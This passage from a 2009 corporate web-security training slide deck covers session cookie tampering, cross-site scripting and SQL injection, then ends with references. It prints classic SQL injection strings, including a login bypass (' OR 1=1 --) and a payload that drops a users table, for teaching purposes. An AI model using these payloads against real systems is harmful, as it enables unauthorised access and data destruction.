D5S5HScdvXE2DMuVESNApHR2SE5WNwRs4ngmvuEQ__/XQAAAA__/S0/PB", null, "/");
2nd Try:rbcSetCookie("F100","1/WK2/H2BlqWdlkC28v8o1dYQkeA9l3p5hmAEK3LsHyree7gKBXvu
WQgoGy52i5QDSsmOc4CasIZ7YqOBcUeuac96oyg__/XQAAAA__/S0/PB", null, "/");
• Things to try:– Save code, modify and resubmit with new values– Modify cookie– Re-use same cookie 1 day later– Test limits– Test hidden forms and variables– Change variables– Expiry?
Session Management
164 © 2009 Wipro Ltd – Internal & Restricted164 © 2009 Wipro Ltd – Internal & Restricted
Cross Site Scripting
• “Cross-Site Scripting”– a web application takes input from a user but fails to validate the input – the input is echoed directly in a web page. – input could be malicious JavaScript, when echoed and interpreted in
the destination browser any number of issues could result
165 © 2009 Wipro Ltd – Internal & Restricted165 © 2009 Wipro Ltd – Internal & Restricted
Cross-Site Scripting (XSS) Attacks
• Modified URL• URL parameters are modified on the URL to contain script code
– Input is not validated and displayed as entered on the resulting dynamic webpage
– XSS – Vulnerable Targets• Weblogs (online journals)• Web bulletin boards• Chat rooms• Guest books• Web mail clients• User confirmation forms in banking applications
166 © 2009 Wipro Ltd – Internal & Restricted166 © 2009 Wipro Ltd – Internal & Restricted
XSS: Script Injection Demo
167 © 2009 Wipro Ltd – Internal & Restricted167 © 2009 Wipro Ltd – Internal & Restricted
XSS: Script Injection Demo (Contd.)
168 © 2009 Wipro Ltd – Internal & Restricted168 © 2009 Wipro Ltd – Internal & Restricted
SQL injection
SQL injection is a security vulnerability that occurs in the database layer of an application.
Trick to inject Structured Query Language (SQL) query or command as an input via web pages
SQL statements “injected” into an existing SQL command
Injection occurs through malformed application input:– Text box– Query string– Manipulated values in HTML
169 © 2009 Wipro Ltd – Internal & Restricted169 © 2009 Wipro Ltd – Internal & Restricted
SQL injection• Example of attack:
– SQL Query in Web application code:– “SELECT * FROM users WHERE login = ‘” + userName + “’ and password= ‘” +
password + “’;”
– Hacker logs in as: ‘ or ‘’ = ‘’; --• SELECT * FROM users WHERE login = ‘’ or ‘’ = ‘’; --'; and password=‘’;
– Hacker deletes the users table with: ‘ or ‘’ = ‘’; DROP TABLE users; --• SELECT * FROM users WHERE login = ‘’ or ‘’=‘’; DROP TABLE users; --'; and
password=‘’;
170 © 2009 Wipro Ltd – Internal & Restricted170 © 2009 Wipro Ltd – Internal & Restricted
SQL Injection – The Problem
Expected:Username: AkhiPassword: p@$$w0rd
SELECT COUNT(*)FROM Users WHERE username=‘Akhi' and password='p@$$w0rd'
The unexpected:Username: ' OR 1=1 --Password:
SELECT COUNT(*)FROM UsersWHERE username='' OR 1=1 -- and password=''
171 © 2009 Wipro Ltd – Internal & Restricted171 © 2009 Wipro Ltd – Internal & Restricted
• Network Security: A hacker’s perspective by A. Fadia, Course Technology, OH, 2003
• Network Security Fundamentals by P. Campbell, B. Calvert, S. Boswell, Course Technology, OH, 2003
• Cryptography and Network Security, 2nd edition by W. Stallings, Prentice Hall, NJ, 1999
• Web Security Basics by S. Bhasin, Course Technology, OH, 2003• Principles of Information Security by M. Whitman, H. Mattord, Course
Technology, OH, 2003• http://www.cert.org/advisories• louisville.edu/infosec/CIS480/Lectures/Attacks.ppt• pages.cs.wisc.edu/~akella/CS640/F06/.../F06_Lecture25_security.ppt • www.ietf.org/proceedings/05aug/slides/saag-3/saag-3.ppt• www.cs.cornell.edu/Courses/cs414/2005sp/lectures/38-attacks.ppt • VIRTUAL PRIVATE NETWORKS (VPN) by Diana Ashikyan,Nikhil Jerath, Connie
Makalintal, Midori Murata
References
© 2009 Wipro Ltd – Internal & Restricted
Thank You